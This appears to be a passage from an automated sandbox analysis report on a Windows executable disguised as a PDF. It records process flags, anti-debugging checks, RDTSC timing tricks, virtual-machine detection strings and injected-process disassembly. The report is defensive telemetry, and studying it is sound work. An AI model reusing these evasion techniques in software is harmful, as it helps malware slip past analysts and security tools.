            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: Ajanlatkeres_2024.05.29.PDF.exe PID: 2820, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: A39904 second address: A3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: A39B7E second address: A39B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory allocated: 2E90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory allocated: 7C10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory allocated: 72A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory allocated: 8D10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeMemory allocated: 9D10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory allocated: 1610000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory allocated: 4F80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory allocated: 77C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory allocated: 87C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeMemory allocated: 77C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_0136C880 rdtsc 6_2_0136C880
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5947Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3796Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7449Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2098Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1068
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8865
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866
            Source: C:\Windows\SysWOW64\chkdsk.exeWindow / User API: threadDelayed 3635
            Source: C:\Windows\SysWOW64\chkdsk.exeWindow / User API: threadDelayed 6336
            Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_20-13919
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 1.6 %
            Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe TID: 7192Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe TID: 6072Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe TID: 7564Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3104Thread sleep count: 1068 > 30
            Source: C:\Windows\explorer.exe TID: 3104Thread sleep time: -2136000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3104Thread sleep count: 8865 > 30
            Source: C:\Windows\explorer.exe TID: 3104Thread sleep time: -17730000s >= -30000s
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7952Thread sleep count: 3635 > 30
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7952Thread sleep time: -7270000s >= -30000s
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7952Thread sleep count: 6336 > 30
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7952Thread sleep time: -12672000s >= -30000s
            Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,15_2_00403D74
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be8M
            Source: Ajanlatkeres_2024.05.29.PDF.exe, 00000006.00000002.1333140834.0000000007B26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqk<
            Source: explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000014.00000000.1348137626.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
            Source: explorer.exe, 00000014.00000003.3084622640.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
            Source: explorer.exe, 00000014.00000000.1348137626.00000000088BA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA)
            Source: explorer.exe, 00000014.00000000.1348137626.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
            Source: explorer.exe, 00000014.00000000.1348137626.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
            Source: explorer.exe, 00000014.00000003.2297215475.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083839373.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757157162.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2297215475.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3086625508.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1348137626.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000014.00000002.3741150645.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
            Source: explorer.exe, 00000014.00000000.1348137626.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
            Source: RegSvcs.exe, 0000000F.00000002.3743055892.0000000000C68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: explorer.exe, 00000014.00000000.1348137626.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 00000014.00000000.1348137626.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
            Source: explorer.exe, 00000014.00000002.3741150645.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 00000014.00000000.1348137626.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000014.00000000.1348137626.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: explorer.exe, 00000014.00000002.3741150645.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_0136C880 rdtsc 6_2_0136C880
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0040ACF0 LdrLoadDll,19_2_0040ACF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040317B mov eax, dword ptr fs:[00000030h]15_2_0040317B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F420F0 mov ecx, dword ptr fs:[00000030h]19_2_00F420F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFA0E3 mov ecx, dword ptr fs:[00000030h]19_2_00EFA0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F860E0 mov eax, dword ptr fs:[00000030h]19_2_00F860E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F080E9 mov eax, dword ptr fs:[00000030h]19_2_00F080E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFC0F0 mov eax, dword ptr fs:[00000030h]19_2_00EFC0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F820DE mov eax, dword ptr fs:[00000030h]19_2_00F820DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC60B8 mov eax, dword ptr fs:[00000030h]19_2_00FC60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FC60B8 mov ecx, dword ptr fs:[00000030h]19_2_00FC60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EF80A0 mov eax, dword ptr fs:[00000030h]19_2_00EF80A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F980A8 mov eax, dword ptr fs:[00000030h]19_2_00F980A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F0208A mov eax, dword ptr fs:[00000030h]19_2_00F0208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F2C073 mov eax, dword ptr fs:[00000030h]19_2_00F2C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F02050 mov eax, dword ptr fs:[00000030h]19_2_00F02050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F86050 mov eax, dword ptr fs:[00000030h]19_2_00F86050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F96030 mov eax, dword ptr fs:[00000030h]19_2_00F96030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFA020 mov eax, dword ptr fs:[00000030h]19_2_00EFA020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00EFC020 mov eax, dword ptr fs:[00000030h]19_2_00EFC020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1E016 mov eax, dword ptr fs:[00000030h]19_2_00F1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1E016 mov eax, dword ptr fs:[00000030h]19_2_00F1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1E016 mov eax, dword ptr fs:[00000030h]19_2_00F1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F1E016 mov eax, dword ptr fs:[00000030h]19_2_00F1E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F84000 mov ecx, dword ptr fs:[00000030h]19_2_00F84000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]19_2_00FA2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]19_2_00FA2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]19_2_00FA2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]19_2_00FA2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]19_2_00FA2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00FA2000 mov eax, dword ptr fs:[00000030h]19_2_00FA2000
